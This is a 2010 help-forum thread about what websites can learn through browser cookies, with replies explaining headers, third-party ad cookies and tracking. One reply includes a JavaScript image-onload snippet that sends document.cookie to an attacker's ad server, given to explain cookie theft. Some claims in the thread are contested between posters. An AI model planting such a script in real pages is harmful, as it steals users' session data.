Computer Hope

Software => Computer viruses and spyware => Topic started by: 0987 on April 01, 2010, 12:16:16 AM

Title: Basic Question about Cookies
Post by: 0987 on April 01, 2010, 12:16:16 AM
I've read multiple sites' definitions and descriptions of cookies, but can't find anything that tells more specifically how much detail those with cookies can see.  I realize they verify my ID so that a site recognizes me and what I've done before at THAT site....but what about when we're at other sites?

 I also know that cookies can be used to track what sites I go to, so that they know my interests, but I want to know how much they can see.  Do they see site types or site names or both? 

Can sites with cookies see ANY of the following?

1. what sites we view (besides theirs) when we don't have their site up?
2. my email addresses or any login or personal contact info at other sites
3. all pages viewed at each site

My brokerages sites are secured so I'm not worried they can see how much I have or the stocks I'm buying, but can they see our family pics on Facebook if we go to Facebook?  What if I search for treatment for an illness?  Can they see the search terms?

I also noticed our city government website has cookies, which we've always allowed, but it's a small city and they dont' need to know I'm doing searches for prostate cancer treatment,  dating sites,  business licenses, psychiatrists......(just for examples).  CAN they know any of that with cookies?
Title: Re: Basic Question about Cookies
Post by: BC_Programmer on April 01, 2010, 07:00:45 AM
A site can only see cookies it created. if facebook creates a cookie, for example, only facebook can read back that cookie.
Title: Re: Basic Question about Cookies
Post by: Dr Jay on April 01, 2010, 08:57:58 AM
Not true, BC_Programmer.

Some sites can spy on your cookies. Also, if you have spyware on your computer, the spyware can read those cookies and phish personal information.
Title: Re: Basic Question about Cookies
Post by: BC_Programmer on April 01, 2010, 09:50:56 AM
Not true, BC_Programmer.

The  browser only allows client side script to view cookies designated as being viewable by the URL as well as cookies designated as anonymous.

a Cookie is simply a small text file. all it contains is:

1. A name-value pair containing the actual data
2. An expiry date after which it is no longer valid
3. The domain and path of the server it should be sent to

note that traditionally number 3 is designated by the filename; Internet Explorer does this. Other browsers store it in a database or other format.

when you request a page and have cookies enabled, the cookie file/data <only for that site> is sent in the HTTP header, and therefore only the cookie data for that site is accessible from a server-side script.

Client side script can only access cookie data designated for it's domain. You cannot spy from one site on the cookies created by, for example. (unless there is a unintended browser vulnerability that makes this possible).

a Tracking cookie, for example, despite what many people have been led to believe, can only track users browser habits across a single domain. This is done by storing, server side, information about the IP address, and generating a random string for each IP address. The browser of course saves this cookie, and thereafter sends that cookie back to the server whenever it navigates across pages within that domain. The server can then use this cookie data and create a log of IP address, page viewed, and the randomly generated key which can later be analyzed to view users browsing habits. In particular it can even track when users change IP addresses, as the browser will send the same cookie containing the same randomly generated string that can be used to lookup previous addresses used by the same visitor.

adware and spyware cookies are third party cookies that are usually set and retrieved via the use of an image from their domain. This is facilitated by the owner of the domain and permitted by them in exchange for ad revenue. The images that are used for advertisements come from a seperate domain; when retrieving these objects the browser sends the same HTTP request header and as per usual sends the cookie information for the domain that the image resides on- the advertisement site, for example. The advertising site can then store information regarding the actual page being viewed, the IP address, and other tracking information.

A cookie is set by the server; the browser itself it responsible for storing the cookie. for example, a browser might send this request to load a page:

Code: [Select]
GET /forum/index.php HTTP/1.1

The server replies with a GET response, which can optionally include a request for the browser to store cookies:

Code: [Select]
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value

since HTTP GET is used to download images as well as other content, this is how "third party" cookies are stored. You might never visit any actual page on or whatever, but their images and other content are used on a variety of advertisement packages that other sites employ to get ad revenue. These images are downloaded from that server and can therefore request the storage of cookies as well as read cookies from your computer that relate to

Therefore when requesting a page containing advertisements, the GET request sent from the browser will contain the cookie data stored for the domain that the image resides on. The server can do what it wants with this data. for advertising sites this probably get's stored in a database somewhere and is used for tracking user habits. Of course the cookie is hardly the <dangerous> part here, since the server could just as easily, and they often do, track movement throughout ad supported pages simply via IP Address.

Spyware can of course see anything on you're PC and cookies are no exception. If you have spyware cookies really shouldn't be a front row concern anyway; since the spyware can watch <everything> you do. it doesn't need to read your cookies to find out your password for certain sites; it can just watch you type them, something it can force you to do by deleting the cookies (which don't usually contain your password plaintext anyway)

But when it comes to actual websites, only the domain that created the cookie can read the cookie data. For example, google stores a cookie when you save your search preferences, such as language, safesearch, etc.

An interesting thing is, if you change your preferences for, even or cannot see  them. to test, I visited and changed my preferences there to display 100 search results. I then saved them (of course) and went to (which redirects to and did a search. I still only got 10 results per page. however, searching with showed 100 results per page.

Cookie theft is probably the only thing that somebody can worry about; this is facilitated by a link or URL being used on one page being used to access another. If the URL is generated via javascript it can be made to include all the cookie data for the first party site. for example, a advertisement might have it's image created as such:

Code: [Select]
<img onload="this.src =''+escape(document.cookie); return false;">
the server at "eviladpage" now has access to the cookies from the first party site where the image was (often by way of advertisements) by way of the PHP parameter "text" being sent. It can then store all that away in a database on the ad site as it pleases.

However, technically speaking, such use of indirection is not really the ad site reading the cookies from another domain; instead, the first domain is explicitly sending the cookie data it has (well, actually the browser is, but the first party site has the image reference) to the ad site; disabling javascript, or using an ad blocker stops this completely.

During the early days of cookie use there was a technique done called "cookie poisoning" wherein a attacker on one PC could hijack an active session of a user on another PC by sending a cookie that makes the server think it came from the victim. This is hardly relevant, though, since this has largely been eliminated by a quick comparision between two IP addresses as well as making such keys different each session.

Cookies, in general, are harmless compared to the other methods of client-side storage such as the new DOM Storage mechanism that will be used in HTML 5 as well as DHTML behaviours (which I think have been (thankfully) removed from IE).
Title: Re: Basic Question about Cookies
Post by: Dr Jay on April 02, 2010, 11:24:59 AM
Oh wow, an explanation based off of a Wikipedia article. Sad part is, it has a moderated message: "This article needs additional citations for verification. Please help improve this article by adding reliable references. Unsourced material may be challenged and removed. (March 2009)"

Allow me to narrow the explanation of cookies.

Cookies are small text objects, stored in a user's browser, to keep information about: visits to the site, preferences of the site, advertising info, and login information.

Cookies have two security risks:

1. Data contained in cookies can be read by the webmaster, and potentially sold to third parties.

2. Tracking cookies can track the way you browse, and tie it to your user profile on their site. Let's say a tracking cookie, such as ValueClick's cookie, is placed on your computer. It can track the way you browse across several websites, then tie it to your email and other personal information. This creates quite a privacy risk.

Overall, only about 1/4 out of every antivirus/anti-malware software, removes tracking cookies.